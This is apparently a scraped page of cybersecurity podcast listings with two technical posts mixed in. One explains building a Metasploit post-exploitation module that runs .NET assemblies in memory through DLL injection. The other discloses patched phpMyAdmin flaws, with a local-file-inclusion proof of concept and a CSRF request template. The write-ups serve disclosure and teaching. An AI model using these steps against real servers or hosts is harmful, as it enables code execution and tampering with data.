Normal view
Hello world!
Community Cyber-Attacks, Simulations and Cooperation | Guest Michael Figueroa
Michael Figueroa discusses the ACSC's first collaborative defense simulation and defending against community-level attacks.
– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
How to Launch a Career in Application Security | Guest Dan Cornell
Learn about AppSec careers in this discussion with Dan Cornell, chief technology officer at Denim Group.
– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
Red Team Operations: Attack and Think Like a Criminal | Guest Jeremy Martin
Dig into the mindset of an attacker with senior security researcher Jeremy Martin.
– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
Career Advice from McAfee’s Lead Scientist | Guest Christiaan Beek
McAfee's Christiaan Beek discusses his career path and the No More Ransom project.
– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
Cyber Threat Hunting: Identify and Hunt Down Intruders | Guest Jeremy Martin
Learn what it takes to be a modern-day threat hunter with senior security researcher Jeremy Martin.
– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
What’s It Like to be a High-End Red Team Member? | Guest David "Moose" Wolpoff
David "Moose" Wolpoff, CTO of Randori, gives a glimpse into the life of a Red Team Operations professional.
– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
Execute assembly via Meterpreter session
Backgroud
Windows to run a PE file relies on reading the header. The PE header describes how it should be loaded in memory, which dependencies has and where is the entry point. And what about .Net Assembly? The entry point is somewhere in the IL code. Direct execution of the assembly using the entry points in the intermediate code would cause an error. This is because the intermediate code should not be executed first but the runtime will load the intermediate code and execute it.
Hosting CLR
In previous versions of Windows, execution is passed to an entry point where the boot code is located. The startup code, is a native code and uses an unmanaged CLR API to start the .NET runtime within the current process and launch the real program that is the IL code. This could be a good strategy to achieve the result. The final aim is: to run the assemply directly in memory, then the dll must have the assembly some where in memory, any command line parameters and a reference to the memory area that contains them.
Execute Assembly
So I need to create a post-exploitation module that performs the following steps:
- Spawn a process to host CLR (meterpreter)
- Reflectively Load HostCLR dll (meterpreter)
- Copy the assembly into the spawned process memory area (meterpreter)
- Copy the parameters into the spawned process memory area (meterpreter)
- Read assembly and parameters (dll)
- Execute the assembly (dll)
To start the Host process, metasploit provides Process.execute which has the following signature:
Process.execute (path, arguments = nil, opts = nil)
The interesting part is the ops parameter:
- Hidden
- Channelized
- Suspended
- InMemory
By setting Channelized to true, I can read the assembly output for free with the call
notepad_process.channel.read
Once the Host process is created, Metasploit provides some functions for interacting with the memory of a remote process:
- inject_dll_into_process
- memory.allocate
- memory.write
The inject_dll_into_process function copies binary passed as an argument to a read-write-exec memory area and returns its address and an offset of the dll's entry point.
exploit_mem, offset = inject_dll_into_process (process, library_path)
The memory.allocate function allocates memory by setting the required protection mode. In this case I will write the parameters and the assembly in the allocated memory area, for none of these two elements I need the memory to be executable so I will set RW.
I decided to organize the memory area dedicated to parameters and assemblies as follows:
- 1024 bytes for the parameters
- 1M for the assembly
assembly_mem = process.memory.allocate (1025024, PAGE_READWRITE)
The third method allows to write data to a specified memory address.
process.memory.write (assembly_mem, params + File.read (exe_path))
Now I have the memory address of dll, the offset to the entry point, the memory address fo both the parameters and the assembly to be executed. Considering the function
Thread.create (entry, parameter = nil, suspended = false)
I can use the memory address of dll plus the offset as a value for the entry parameter and the address the parameter and assembly memory area as the parameter parameter value.
process.thread.create (exploit_mem + offset, assembly_mem)
This results in a call to the entry point and an LPVOID pointer as input parameter.
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
It's all I need to recover the parameters to be passed to the assembly and the assembly itself.
ReadProcessMemory(GetCurrentProcess(), lpPayload, allData, RAW_ASSEMBLY_LENGTH + RAW_AGRS_LENGTH, &readed);
About the assemblies to be executed, it is important to note that the signature of the Main method must match with the parameters that have been set in the module, for example:
- If the property ARGUMENTS is set to "antani sblinda destra" the main method should be "static void main (string [] args)"
- If the property ARGUMENTS is set to "" the main method should be "static void main ()"
Chaining with SharpGen
A few days ago I read a blog post from @cobb_io where he presented an interesting tool for inline compilation of .net assemblies. By default execute-assembly module looks for assemblies in $(metasploit-framework-home)/data/execute-assembly but it is also possible to change this behavior by setting the property ASSEMBLYPATH for example by pointing it to the SharpGen Output folder in this way I can compile the assemblies and execute them directly with the module.
DNS Exploits, Concerns and Easy Fixes | Guest Andrew Wertkin
Andrew Wertkin, CTO at BlueCat Networks, discusses DNS security.
– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
Malware Removal and Security Tips with Malwarebytes | Guest Michael Sherwood
Michael Sherwood, senior director of technician services at Malwarebytes, talks malware.
– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
PHPMyAdmin multiple vulnerabilities
During an assignment, I found several serious vulnerabilities in phpMyAdmin, which is an application massively used to manage MariaDB and MySQL databases. One of them potentially leads to arbitrary code execution by exploiting a Local file inclusion, while the other is a CSRF allowing any table entry to be edited.
1. Local File INCLUSION in transformation feature
The transformation feature from PHPMyAdmin allows to have a specific display for some columns when selecting them from a table. For example, it can transform links in text format to clickable links when rendering them.
Those transformations are defined in PHPMyAdmin’s “column_info” system table, which usually resides in the phpmyadmin database. However, every database can ship its own version of phpmyadmin system tables. For creating phpmyadmin system tables for a specific database, the following call can be used: http://phpmyadmin/chk_rel.php?fixall_pmadb=1&db=*yourdb*.
It will create a set of pma__* tables into your database.
Here is an example of how the transformation is applied, from tbl_replace.php:
<?php
$mime_map = Transformations::getMIME($GLOBALS['db'], $GLOBALS['table']);
[...]
// Apply Input Transformation if defined
if (!empty($mime_map[$column_name])
&& !empty($mime_map[$column_name]['input_transformation'])
) {
$filename = 'libraries/classes/Plugins/Transformations/'
. $mime_map[$column_name]['input_transformation'];
if (is_file($filename)) {
include_once $filename;
$classname = Transformations::getClassName($filename);
/** @var IOTransformationsPlugin $transformation_plugin */
$transformation_plugin = new $classname();
$transformation_options = Transformations::getOptions(
$mime_map[$column_name]['input_transformation_options']
);
$current_value = $transformation_plugin->applyTransformation(
$current_value, $transformation_options
);
// check if transformation was successful or not
// and accordingly set error messages & insert_fail
if (method_exists($transformation_plugin, 'isSuccess')
&& !$transformation_plugin->isSuccess()
) {
$insert_fail = true;
$row_skipped = true;
$insert_errors[] = sprintf(
__('Row: %1$s, Column: %2$s, Error: %3$s'),
$rownumber, $column_name,
$transformation_plugin->getError()
);
}
}
}
The transformation is fetched from the “pma__column_info” system table in the current database, or from the “phpmyadmin” database instead. The “input_transformation” column is used as a filename to include, and is vulnerable to a path traversal that leads to a local file inclusion.
Here is a PoC to exploit this vulnerability:
- Create a new database “foo” with a random “bar” table containing a “baz” column, with a data containing PHP code in it (to fill the session with some php code):
CREATE DATABASE foo;
CREATE TABLE foo.bar ( baz VARCHAR(255) PRIMARY KEY );
INSERT INTO foo.bar SELECT '<?php phpinfo() ?>'; - Create phpmyadmin system tables in your db by calling http://phpmyadmin/chk_rel.php?fixall_pmadb=1&db=foo
- Fill the transformation information with the path traversal in the “pma__column_info” table:
INSERT INTO `pma__column_info`SELECT '1', 'foo', 'bar', 'baz', 'plop',
'plop', 'plop', 'plop',
'[path_traversal]/var/lib/php/sessions/sess_{yourSessionId}','plop'; - Browsing to http://phpmyadmin/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[multi_edit][][]=baz&clause_is_unique=1 will trigger the phpinfo(); call.
2. CSRF for updating data in table
This vulnerability is pretty easy to understand. A simple GET request can be used to update data in a table. Here is an example :
http://phpmyadmin/tbl_replace.php?db=*yourDB*&table=*yourTable*&fields_name[multi_edit][0][0]=*fieldToEdit*&fields[multi_edit][0][0]=*fieldNewValue*&clause_is_unique=1&where_clause=*whereClause*
A malicious user could force a logged-in user to update arbitrary tables in arbitrary DBs. This can also be used in a simple <img> element on forums or elsewhere, as the request is a simple GET one.
These vulnerabilities are both important. We responsibly disclosed them and they were patched on the newly released phpMyAdmin 4.8.4.
Timeline :
- 2018.06.21 – Initial contact with phpMyAdmin security team.
- 2018.06.24 – Initial response that the team will investigate.
- 2018.08.02 – Request for news.
- 2018.08.28 – Re-request for news.
- 2018.08.31 – Response from phpMyAdmin team that they’re still in the process of fixing things.
- 2018.11.01 – Request for news.
- 2018.12.07 – Apologies from phpMyAdmin + explanation that a lot of code rewrite was necessary for multiple CSRF flaws.
- 2018.12.11 – New version released with patch.
Update your things!
10 Proven Security Awareness Tips From Osterman Research | Guest Michael Osterman
Michael Osterman, president and analyst at Osterman Research, shares security awareness tips and strategies
– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
Drilling Holes in ATMs, Card Skimming and Other Fraud | Guest Stan Engelbrecht
Stan Engelbrecht, director of cyber security practice for D3 Security, discusses ATM fraud.
– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
Are Third-Party Vendors Your Biggest Cybersecurity Risk? | Guest Fred Kneip
Fred Kneip, CEO of CyberGRX, discusses the growth of risk from third-party vendors.
– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
Transform Your Organization with a Security Champion | Guest Jeff Williams
OWASP co-founder Jeff Williams discusses how developing a Security Champion can make your organization more secure.
– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
Securing the Internet-of-Things (IoT) | Guest Dr. Jared DeMott
Dr. Jared DeMott, CEO and founder of VDA Labs, chats about the security risks associated with the Internet of Things (IoT).
– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
Developing Security Champions within DevOps | Guest Ty Sbano
Ty Sbano, head of security at Periscope Data, talks about building Security Champions in the world of DevOps.
– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
How is Cybercrime Impacting the Financial Sector? | Guest Todd Weller
Todd Weller, chief strategy officer at Bandura Systems, discusses cybercrime in the financial sector and how to build a security awareness program on a budget.
– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
New Phishing Trends, Old Tactics and Security Awareness | Guest Pedram Amini
Pedram Amini, creator of the Zero Day Initiative, talks about how phishing has changed — and stayed the same — over recent years.
– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
- Infosec Resources
- Get Started in Cybersecurity: Beginner Tips, Certifications and Career Paths | Guest Keatron Evans
Get Started in Cybersecurity: Beginner Tips, Certifications and Career Paths | Guest Keatron Evans
Cybersecurity professional Keatron Evans shares tips for those looking to break into the industry or change careers.
– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
- Infosec Resources
- Armed Services, Social Engineering and Sensationalist Reporting | Guest Michel Huffaker
Armed Services, Social Engineering and Sensationalist Reporting | Guest Michel Huffaker
Michel Huffaker, director of threat intelligence at ThreatQuotient, talks about cybersecurity issues facing the military.
- Infosec Resources
- Breaking into IT: From First Job to Advanced Certs with CompTIA | Teresa Sears and Christine Tuttleman
Breaking into IT: From First Job to Advanced Certs with CompTIA | Teresa Sears and Christine Tuttleman
CompTIA subject matter experts discuss beginner IT jobs, skills and certifications
Midterm Elections, Hacking and Information Warfare | Guest John Dickson
John Dickson, Principal at Denim Group, talks about cybersecurity issues related to the upcoming midterm elections.
– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
Defending Against and Recovering from Ransomware | Guest Bill Siegel
Bill Siegel, co-founder of ransomware-recovery company Coveware, discusses ransomware trends.
– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
- Infosec Resources
- Turn the Tables on Your Attackers with Deception Technology | Guest Carolyn Crandall
Turn the Tables on Your Attackers with Deception Technology | Guest Carolyn Crandall
Chief deception officer Carolyn Crandall talks about using deception technology to trick attackers and protect organizations.
– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
- Infosec Resources
- CISSP Exam Changes: Tips to Pass the New CAT Format (and Free E-book) | Guest Ken Magee
CISSP Exam Changes: Tips to Pass the New CAT Format (and Free E-book) | Guest Ken Magee
Learn everything you need to pass the new CISSP exam in this discussion with InfoSec Instructor Ken Magee.
– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
Privacy and Anonymity in the Modern World | Guest Lance Cottrell
Lance Cottrell of Ntrepid discusses the evolution of online privacy and anonymity.
– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
Healthcare’s Many Cybersecurity Challenges | Guest Lisa Hedges
Lisa Hedges, content analyst at Software Advice, Gartner Digital Markets, talks about the many cybersecurity challenges facing the healthcare sector.
– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast